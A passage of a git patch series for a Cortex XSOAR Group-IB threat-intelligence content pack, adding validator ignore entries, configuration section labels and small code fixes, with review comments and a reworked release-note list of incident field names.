+ignore=IF115 + +[file:incidentfield-GIB_Date_Last_Seen.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Service_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Contacts.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Date.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Regions.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json] +ignore=IF115 + +[file:incidentfield-GIB_Emails.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Domain_Expiration_Date.json] +ignore=IF115 + +[file:incidentfield-GIB_Has_Exploit.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Malware.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Sources.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Service_IP.json] +ignore=IF115 + +[file:incidentfield-GIB_Reporter.json] +ignore=IF115 + +[file:incidentfield-GIB_Compromised_Events_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json] +ignore=IF115 + +[file:incidentfield-GIB_Compromised_Account.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Aliases.json] +ignore=IF115 + +[file:incidentfield-GIB_CVSS_Score.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Site_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Threat_Level.json] +ignore=IF115 + +[file:incidentfield-GIB_VPN_Names.json] +ignore=IF115 + +[file:incidentfield-GIB_Service_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_Update_Time.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Base.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Categories.json] +ignore=IF115 + 
+[file:incidentfield-GIB_Cybercriminal_Malware.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Kit_Path.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Country_Code.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_IP.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Overall.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Sectors.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Protocol.json] +ignore=IF115 + +[file:incidentfield-GIB_CNC_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_City.json] +ignore=IF115 + +[file:incidentfield-GIB_Report_Number.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Domain_Puny.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Target_Domain_Provider.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Created_At.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Body_Hash.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Region.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Headers_Body.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_SWIFT.json] +ignore=IF115 + +[file:incidentfield-GIB_Affected_Software_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Source_Countries.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Brand.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Date_Added.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_File_hash.json] +ignore=IF115 + +[file:incidentfield-GIB_Downloaded_From_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Updated_At.json] +ignore=GR103 + +[file:incidentfield-GIB_Scanner_Sources.json] +ignore=BA116 + 
+[file:incidentfield-GIB_Phishing_Date_Updated.json] +ignore=BA116 + +[file:layoutscontainer-GIB_OSI_Git_Leak_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_OSI_Public_Leak_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Mule_Layout.json] +ignore=LO107 \ No newline at end of file From 723d92d2ca59193c233ec00f279b01a7386a8808 Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 11:58:53 +0200 Subject: [PATCH 3/9] Various fixes --- .../.pack-ignore | 71 +++++++++++++++++-- .../Integrations/GroupIBTIA/GroupIBTIA.yml | 15 +++- .../GroupIBTIA/GroupIBTIA_test.py | 1 + .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.py | 2 +- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml | 19 +++++ 5 files changed, 101 insertions(+), 7 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 82b60a088577..43743e9609fe 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -2,14 +2,11 @@ ignore=BA108,BA109,BC104,BC102,ST111,RM110 [file:GroupIB_TIA_Feed.yml] -ignore=BA108,BA109,IN163,ST111 +ignore=BA108,BA109 [file:classifier-Group-IB_Threat_Intelligence_&_Attribution_(mapper).json] ignore=BA101 -[file:classifier-Group-IB_Threat_Intelligence_mapper.json] -ignore=BC113 - [file:GroupIBTIA_image.png] ignore=IM111 
@@ -290,4 +287,68 @@ ignore=LO107 ignore=LO107 [file:layoutscontainer-GIB_Compromised_Mule_Layout.json] -ignore=LO107 \ No newline at end of file +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Card_Group_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json] +ignore=LO107 + + +[file:layoutscontainer-GIB_Cybercriminal_Threat_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_Deface_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_APT_Threat_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Data_Breach_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Account_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_OSI_Vulnerability_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Card_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Malware_CNC_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Malware_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_DDOS_Layout.json] +ignore=LO107 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml index f2464006d9ab..f68d0a6dea87 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml @@ -1,4 +1,7 @@ category: Data Enrichment & Threat Intelligence +sectionOrder: +- Connect +- Collect commonfields: id: Group-IB Threat Intelligence & Attribution version: -1 @@ -9,27 +12,33 @@ configuration: name: url required: true type: 0 + section: Connect - additionalinfo: The API Key and Username required to authenticate to the service. display: Username name: credentials required: true type: 9 + section: Connect - additionalinfo: Whether to allow connections without verifying SSL certificates validity. display: Trust any certificate (not secure) name: insecure required: false type: 8 + section: Connect - additionalinfo: Whether to use XSOAR system proxy settings to connect to the API. display: Use system proxy settings name: proxy required: false type: 8 + section: Connect - display: Fetch incidents name: isFetch required: false type: 8 + section: Collect - additionalinfo: Type(s) of incidents to fetch from the third party API. - display: Colletions to fetch + display: Collections to fetch + section: Collect hidden: false name: incident_collections options: @@ -59,6 +68,7 @@ configuration: type: 16 - additionalinfo: Date to start fetching incidents from. defaultvalue: 3 days + section: Collect display: Incidents first fetch hidden: false name: first_fetch 
@@ -66,6 +76,7 @@ configuration:
   type: 0
 - additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 incidents). If you face some runtime errors, lower the value.
   defaultvalue: '3'
+  section: Collect
   display: Number of requests per collection
   hidden: false
   name: max_fetch
@@ -79,10 +90,12 @@ configuration:
   type: 15
 - display: Incident type
   name: incidentType
+  section: Collect
   required: false
   type: 13
 - display: Hunting Rules
   name: hunting_rules
+  section: Collect
   defaultvalue: "false"
   type: 8
   required: false
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py
index 38558fd82581..e40dad6752f3 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py
@@ -51,6 +51,7 @@
     "compromised/breached"
 ]
 
+
 @pytest.fixture(scope="function", params=COLLECTION_NAMES)
 def session_fixture(request):
     """
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py
index 9b8c283e3874..0379ecae1514 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py
@@ -1245,7 +1245,7 @@ def validate_launch_get_indicators_command(limit, collection_name):
     except ValueError:
         raise Exception("A limit should be a number, not a string.")
 
-    if collection_name not in COMMON_MAPPING.keys():
+    if collection_name not in COMMON_MAPPING:
         raise Exception(
             "Incorrect collection name. Please, choose one of the displayed options."
         )
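Review bot: The membership test on the new line is the right idiom, but both error paths in `validate_launch_get_indicators_command` still raise a bare `Exception`, and the message on the rejected-collection branch does not say which value was rejected, which makes a misconfigured instance hard to diagnose from the log. XSOAR integrations conventionally raise `DemistoException` so the platform reports the failure as an integration error; since it subclasses `Exception`, existing callers and tests catching `Exception` keep working. On the touched branch that would be `raise DemistoException(f"Incorrect collection name '{collection_name}'. Please, choose one of the displayed options.")`. The function's opening lines, including the `try` that the visible `except ValueError:` belongs to, are above the hunk.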
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml index 180a4751c1c9..7536a7415422 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml @@ -1,4 +1,7 @@ category: Data Enrichment & Threat Intelligence +sectionOrder: +- Connect +- Collect commonfields: id: Group-IB Threat Intelligence & Attribution Feed version: -1 @@ -9,21 +12,25 @@ configuration: name: url required: true type: 0 + section: Connect - additionalinfo: The API Key and Username required to authenticate to the service. display: Username name: credentials required: true type: 9 + section: Connect - additionalinfo: Whether to allow connections without verifying SSL certificates validity. display: Trust any certificate (not secure) name: insecure type: 8 required: false + section: Connect - additionalinfo: Whether to use XSOAR system proxy settings to connect to the API. display: Use system proxy settings name: proxy type: 8 required: false + section: Connect - additionalinfo: Incremental feeds pull only new or modified indicators that have been sent from the integration. The determination if the indicator is new or modified happens on the 3rd-party vendor's side, so only indicators that are new or modified are sent to Cortex XSOAR. Therefore, all indicators coming from these feeds are labeled new or modified. defaultvalue: 'true' display: Incremental feed 
@@ -31,11 +38,13 @@ configuration: name: feedIncremental type: 8 required: false + section: Collect - defaultvalue: 'true' display: Fetch indicators name: feed type: 8 required: false + section: Collect - additionalinfo: Indicators from this integration instance will be marked with this reputation defaultvalue: Suspicious display: Indicator Reputation @@ -47,6 +56,7 @@ configuration: - Bad type: 18 required: false + section: Collect - additionalinfo: Reliability of the source providing the intelligence data defaultvalue: A - Completely reliable display: Source Reliability @@ -60,16 +70,19 @@ configuration: - F - Reliability cannot be judged required: true type: 15 + section: Collect - defaultvalue: '1' display: Feed Fetch Interval name: feedFetchInterval type: 19 required: false + section: Collect - additionalinfo: When selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system. display: Bypass exclusion list name: feedBypassExclusionList type: 8 required: false + section: Collect - additionalinfo: Collections List to include for fetching. display: Indicator collections name: indicator_collections @@ -95,6 +108,7 @@ configuration: type: 16 required: false hidden: false + section: Collect - additionalinfo: Date to start fetching indicators from. defaultvalue: 3 days display: Indicator first fetch @@ -102,9 +116,11 @@ configuration: type: 0 required: false hidden: false + section: Collect - additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 objects with different amount of indicators). If you face some runtime errors, lower the value. defaultvalue: '2' display: Number of requests per collection + section: Collect name: requests_count options: - '1' 
@@ -117,12 +133,14 @@ configuration: hidden: false - additionalinfo: Supports CSV values. display: Tags + section: Collect name: feedTags type: 0 required: false - additionalinfo: The Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed display: Traffic Light Protocol Color name: tlp_color + section: Collect options: - RED - AMBER @@ -133,6 +151,7 @@ configuration: - display: '' name: feedExpirationPolicy type: 17 + section: Collect options: - never - interval From 56a34b4be9faddaf0063afc0a90f1a3c65f96a63 Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 12:25:00 +0200 Subject: [PATCH 4/9] RNs redo --- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml | 2 +- .../ReleaseNotes/2_0_0.md | 885 +++++++----------- 2 files changed, 335 insertions(+), 552 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml index 7536a7415422..58bd29bdaaa5 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml @@ -156,11 +156,11 @@ configuration: - never - interval - indicatorType - - suddenDeath - display: '' name: feedExpirationInterval type: 1 required: false + section: Collect description: Use Group-IB Threat Intelligence Feed integration to fetch IOCs from various Group-IB collections. display: Group-IB Threat Intelligence Feed name: Group-IB Threat Intelligence & Attribution Feed diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index 917ce431a716..dfe89d9f6364 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md 
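Review bot: Dropping `suddenDeath` from the `feedExpirationPolicy` options is a user-visible configuration change for the Feed integration, and an instance that had that policy selected no longer matches any listed option after upgrade; the hunk gives no hint of how such instances are migrated or what expiration behaviour they fall back to. The feed's release-note entry further down in this commit mentions only the code rewrite and the Docker image, so a line such as `- Removed the *suddenDeath* option from the **Feed Expiration Policy** parameter; instances using it should select another policy.` would help operators. Whether the platform keeps the stored value or resets it, I cannot tell from here.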
@@ -7,614 +7,397 @@ #### Incident Fields -- Added new incident fields for new and old collections and also changed old incident fields related to old collections - -##### GIB Address - -##### New: GIB Cybercriminal Forums Table - -##### GIB Downloaded From - -##### New: GIB Nation-State Cybercriminals Expertises - -##### New: GIB Merged Cvss - -##### New: GIB Nation-State Cybercriminals Threat Actor Aliases - -##### New: GIB Malware Platforms - -##### New: GIB Leak Published - -##### New: GIB Report Number - -##### New: GIB Provider Domain - -##### New: GIB CPE Table - -##### New: GIB Socks Proxy Source - -##### New: GIB Target Provider - -##### New: GIB Cybercriminal Sectors - -##### New: GIB Nation-State Cybercriminals Regions - -##### New: GIB Nation-State Cybercriminals Threat Title - -##### New: GIB Date Add - -##### GIB Leaked File Name - -##### New: GIB Date First Compromised - -##### New: GIB Compromised Events Information Table - -##### New: GIB Cybercriminal Threat Title - -##### New: GIB Nation-State Cybercriminals Threat Actor Reports Table - -##### New: GIB DDOS Date End - -##### New: GIB Cybercriminal Threat Actor Report Authors - -##### New: GIB Organization IBAN - -##### New: GIB Mirror Link - -##### GIB ID - -##### New: GIB Deface Date - -##### New: GIB DDOS Request Body - -##### GIB Card Number - -##### New: GIB Email Domains - -##### New: GIB DDOS Target City - -##### GIB Phishing Date Blocked - -##### GIB Date of Detection - -##### New: GIB Organization BSB - -##### New: GIB Malware Description - -##### New: GIB Phishing URLs - -##### New: GIB Nation-State Cybercriminals Threat Regions - -##### New: GIB Nation-State Cybercriminals Threat Actor Country - -##### New: GIB Target IP - -##### New: GIB Threat Level - -##### New: GIB Country Name - -##### New: GIB Organization CLABE - -##### New: GIB Date Last Compromised - -##### New: GIB Extended CVSS Base - -##### New: GIB Vulnerability Type - -##### New: GIB Proxy Port - -##### New: GIB Date Last 
Seen - -##### New: GIB Phishing Kit Path - -##### GIB Severity - -##### New: GIB DDOS Target Domain - -##### New: GIB Organization SWIFT - -##### New: GIB Malware Aliases - -##### GIB Drop Email - -##### New: GIB Target ASN - -##### New: GIB Extended CVSS Temporal - -##### New: GIB Downloaded From Table - -##### New: GIB Nation-State Cybercriminals Threat Actor Roles - -##### New: GIB Date Updated At - -##### New: GIB Malware Regions - -##### GIB Drop Email Domain - -##### New: GIB VPN Sources - -##### GIB Malware Name - -##### New: GIB Link List Table - -##### New: CPE Table - -##### GIB Favicon - -##### GIB Person - -##### New: GIB Affected Software Table - -##### New: GIB CVSS Vector - -##### New: GIB Passwords - -##### GIB Date Compromised - -##### GIB Leak Name - -##### New: GIB DDOS Request Headers Body - -##### New: GIB Emails - -##### GIB Compromised Login - -##### GIB Related Indicators Data - -##### New: GIB Organization Name - -##### New: GIB Malware Table - -##### New: GIB DDOS Date Begin - -##### GIB CVV - -##### New: GIB Nation-State Cybercriminals Threat Langs - -##### GIB Admiralty Code - -##### New: GIB DDOS Target URL - -##### New: GIB DDOS Target Provider - -##### New: GIB Proxy Source - -##### New: GIB Extended CVSS Overall - -##### GIB Phishing Type - -##### New: GIB Malware Short Description - -##### New: GIB Nation-State Cybercriminals Threat Description - -##### GIB Email - -##### New: GIB Parsed Login Domain - -##### GIB Inject Dump - -##### New: GIB Cybercriminal Threat Description - -##### New: GIB CNC Port - -##### New: GIB Service IP - -##### GIB Leaked Data - -##### New: GIB Phishing Kit Email - -##### New: GIB Is Tailored - -##### New: GIB Target Domain Provider - -##### New: GIB Extended Description - -##### New: GIB Upload Time - -##### New: GIB Malware File hash - -##### New: GIB Nation-State Cybercriminals Threat Actor Labels - -##### New: GIB DDOS Target Country Code - -##### New: GIB Matches Table - -##### New: GIB Phishing IP 
Table - -##### New: GIB DDOS Request Headers Hash - -##### GIB Password - -##### New: GIB DDOS Protocol - -##### New: GIB DDOS Date Registration - -##### New: GIB Cybercriminal Regions - -##### New: GIB Proxy Type - -##### GIB Phishing Kit Emails - -##### GIB Source - -##### GIB Phishing Status - -##### New: GIB DDOS Target Port - -##### New: GIB Malware Langs - -##### New: GIB Service URL - -##### New: GIB Nation-State Cybercriminals Threat Expertises - -##### New: GIB Deface Source - -##### New: GIB Nation-State Cybercriminals Malware - -##### GIB Name Servers - -##### New: GIB Country Code - -##### New: GIB Bulletin Family - -##### New: GIB Deface Site URL - -##### New: GIB Has Exploit - -##### GIB Reliability - -##### New: GIB Nation-State Cybercriminals Threat Actor Description - -##### New: GIB Target Region - -##### New: GIB Phishing Domain Puny - -##### New: GIB Nation-State Cybercriminals Threat Report Number - -##### New: GIB Phishing Objectives - -##### New: GIB Phishing Sources - -##### New: GIB Date Modified - -##### New: GIB DDOS Target Category - -##### New: GIB Cybercriminal Threat Actor Aliases - -##### New: GIB Service Domain - -##### GIB Title - -##### New: GIB Phishing Registrar - -##### GIB Card Issuer - -##### New: GIB Cybercriminal Expertises - -##### New: GIB Nation-State Cybercriminals Sectors - -##### New: GIB GIT Source - -##### GIB Threat Actor is APT - -##### New: GIB DDOS Target IP - -##### New: GIB Nation-State Cybercriminals Threat Actor CVE - -##### New: GIB DDOS Request Body Hash - -##### New: GIB CNC URL - -##### New: GIB Compromised Events Table - -##### New: GIB Extended CVSS Exploitability - -##### New: GIB Threat Actors Table - -##### New: GIB Nation-State Cybercriminals Threat Sectors - -##### New: GIB Organization BIC - -##### GIB Inject MD5 - -##### New: GIB Target City - -##### New: GIB DDOS Type - -##### GIB Date Created - -##### New: GIB Phishing Date Updated - -##### New: GIB Date First Seen - -##### New: GIB Date 
Published - -##### New: GIB Malware Categories - -##### New: GIB DDOS Target Region - -##### New: GIB DDOS Source - -##### New: GIB VPN Names - -##### New: GIB Cybercriminal Malware - -##### New: GIB Extended CVSS Impact - -##### GIB Payment System - -##### New: GIB Phishing Domain Expiration Date - -##### GIB Victim IP - -##### GIB Repository - -##### New: GIB DDOS Duration - -##### New: GIB DDOS Target Country Name - -##### New: GIB Phishing Kit Table - -##### New: GIB Reporter - -##### GIB Phishing Kit Hash - -##### New: GIB Date Created At - -##### New: GIB Phishing Kit Source - -##### New: GIB Nation-State Cybercriminal Forums Table - -##### GIB Threat Actor ID - -##### GIB Credibility - -##### New: GIB Nation-State Cybercriminals Threat Countries - -##### New: GIB Cybercriminal Threat Actor Description - -##### New: GIB Parsed Login IP - -##### New: GIB Phishing Date Detected - -##### GIB Card Type - -##### GIB Threat Actor Name - -##### GIB Target Brand - -##### New: GIB Deface Contacts - -##### New: GIB Proxy Sources - -##### New: GIB Phishing Brand - -##### New: GIB Threat Actor Country - -##### New: GIB Scanner Categories - -##### New: GIB Nation-State Cybercriminals Threat Actor Goals - -##### New: GIB Cybercriminal Threat Actor Reports Table - -##### New: GIB Malware CNC Domain - -##### GIB HTML - -##### New: GIB CNC - -##### New: GIB DDOS Target ASN - -##### GIB Screenshot - -##### GIB Phishing Domain - -##### New: GIB Href - -##### New: GIB OSI Git Repository Files Table - -##### New: GIB Malware Source Countries - -##### GIB Card Valid Thru - -##### New: GIB Scanner Sources - -##### New: GIB Phishing Date Added - -##### GIB Target Category - -##### New: GIB CVSS Score - -##### GIB Date Expired - -##### New: GIB Compromised Account - -##### New: GIB DDOS Request Data Link - -##### New: GIB CNC Domain - -##### New: GIB Date Incident - -##### GIB Portal Link - -##### GIB Target Domain - -##### New: GIB Update Time - -##### GIB Data Hash - +- New: **GIB 
Target ASN** +- **GIB Related Indicators Data** +- **GIB Inject Dump** +- New: **GIB Organization SWIFT** +- New: **GIB Update Time** +- **GIB Name Servers** +- **GIB Portal Link** +- **GIB Source** +- New: **GIB DDOS Target URL** +- New: **GIB Proxy Source** +- New: **GIB Reporter** +- New: **GIB CNC Domain** +- New: **GIB Phishing Brand** +- **GIB Card Valid Thru** +- New: **GIB Compromised Account** +- **GIB Payment System** +- New: **GIB Phishing Date Added** +- New: **GIB Report Number** +- New: **GIB Email Domains** +- New: **GIB Nation-State Cybercriminals Sectors** +- New: **GIB Malware Langs** +- New: **GIB Target IP** +- New: **GIB Date Modified** +- New: **GIB GIT Source** +- New: **GIB Deface Date** +- New: **GIB Cybercriminal Regions** +- New: **GIB DDOS Request Body Hash** +- New: **GIB CNC** +- New: **GIB DDOS Request Body** +- New: **GIB Nation-State Cybercriminals Threat Actor CVE** +- **GIB Date of Detection** +- **GIB Phishing Date Blocked** +- New: **GIB Phishing Registrar** +- New: **GIB DDOS Request Data Link** +- New: **GIB Nation-State Cybercriminals Regions** +- New: **GIB Cybercriminal Expertises** +- New: **GIB Malware Aliases** +- **GIB Phishing Kit Hash** +- **GIB Admiralty Code** +- New: **GIB Phishing Kit Source** +- New: **GIB Threat Actor Country** +- New: **GIB Date Add** +- New: **GIB DDOS Protocol** +- **GIB Downloaded From** +- New: **GIB Malware Source Countries** +- New: **GIB DDOS Date Registration** +- New: **GIB DDOS Target Port** +- New: **GIB CPE Table** +- New: **GIB Organization CLABE** +- **GIB Threat Actor Name** +- New: **GIB Is Tailored** +- New: **GIB Phishing Objectives** +- New: **GIB Has Exploit** +- New: **GIB OSI Git Repository Files Table** +- New: **GIB Cybercriminal Sectors** +- New: **GIB Phishing Domain Puny** +- **GIB Phishing Domain** +- New: **GIB Socks Proxy Source** +- New: **GIB Nation-State Cybercriminals Threat Description** +- **GIB Screenshot** +- New: **GIB Threat Level** +- New: **GIB Link 
List Table** +- New: **GIB Nation-State Cybercriminals Threat Title** +- New: **GIB Proxy Type** +- New: **GIB Vulnerability Type** +- New: **GIB Cybercriminal Threat Actor Reports Table** +- New: **GIB Affected Software Table** +- New: **GIB VPN Sources** +- New: **GIB Parsed Login Domain** +- New: **GIB Nation-State Cybercriminals Threat Actor Roles** +- New: **GIB Organization IBAN** +- New: **GIB DDOS Target Domain** +- New: **GIB Cybercriminal Malware** +- New: **GIB Compromised Events Information Table** +- New: **GIB Mirror Link** +- New: **CPE Table** +- New: **GIB Cybercriminal Forums Table** +- New: **GIB Nation-State Cybercriminals Threat Actor Country** +- New: **GIB Cybercriminal Threat Actor Report Authors** +- New: **GIB Cybercriminal Threat Actor Aliases** +- New: **GIB Cybercriminal Threat Description** +- New: **GIB Malware Regions** +- New: **GIB Cybercriminal Threat Actor Description** +- New: **GIB CNC Port** +- New: **GIB Target Provider** +- **GIB Card Number** +- New: **GIB Phishing IP Table** +- New: **GIB Cybercriminal Threat Title** +- **GIB Inject MD5** +- **GIB Malware Name** +- New: **GIB Nation-State Cybercriminals Threat Expertises** +- New: **GIB DDOS Target ASN** +- New: **GIB Malware Description** +- **GIB Card Issuer** +- New: **GIB DDOS Request Headers Hash** +- **GIB Drop Email** +- New: **GIB Phishing URLs** +- **GIB Credibility** +- New: **GIB Target Domain Provider** +- New: **GIB Extended CVSS Overall** +- New: **GIB DDOS Date Begin** +- **GIB Person** +- New: **GIB DDOS Source** +- New: **GIB Extended CVSS Exploitability** +- New: **GIB Malware CNC Domain** +- **GIB Date Created** +- New: **GIB DDOS Target Category** +- New: **GIB Date Published** +- New: **GIB Phishing Sources** +- New: **GIB Href** +- New: **GIB Nation-State Cybercriminals Expertises** +- **GIB Card Type** +- New: **GIB Proxy Port** +- New: **GIB Date First Seen** +- New: **GIB DDOS Target Region** +- New: **GIB Extended CVSS Impact** +- New: **GIB CVSS 
Score** +- **GIB Date Compromised** +- **GIB Severity** +- **GIB Date Expired** +- New: **GIB Proxy Sources** +- New: **GIB Passwords** +- New: **GIB Compromised Events Table** +- **GIB Target Brand** +- New: **GIB Emails** +- **GIB Repository** +- New: **GIB Date Created At** +- New: **GIB DDOS Target Country Code** +- New: **GIB Service IP** +- New: **GIB Country Name** +- New: **GIB Nation-State Cybercriminals Threat Report Number** +- New: **GIB Nation-State Cybercriminals Threat Sectors** +- New: **GIB DDOS Duration** +- New: **GIB Leak Published** +- New: **GIB DDOS Date End** +- New: **GIB Deface Source** +- **GIB Target Domain** +- New: **GIB Nation-State Cybercriminals Threat Actor Labels** +- **GIB ID** +- **GIB Target Category** +- New: **GIB Extended CVSS Base** +- New: **GIB VPN Names** +- **GIB Leaked File Name** +- New: **GIB Upload Time** +- **GIB Email** +- New: **GIB Nation-State Cybercriminals Malware** +- New: **GIB Target Region** +- **GIB Phishing Type** +- **GIB CVV** +- New: **GIB CVSS Vector** +- New: **GIB Matches Table** +- New: **GIB Deface Contacts** +- New: **GIB Malware Platforms** +- New: **GIB Phishing Domain Expiration Date** +- New: **GIB Service URL** +- **GIB Favicon** +- New: **GIB Date Incident** +- New: **GIB Nation-State Cybercriminals Threat Regions** +- New: **GIB Nation-State Cybercriminals Threat Langs** +- New: **GIB Threat Actors Table** +- New: **GIB Malware Table** +- **GIB Threat Actor is APT** +- New: **GIB Extended CVSS Temporal** +- New: **GIB Phishing Kit Path** +- New: **GIB Nation-State 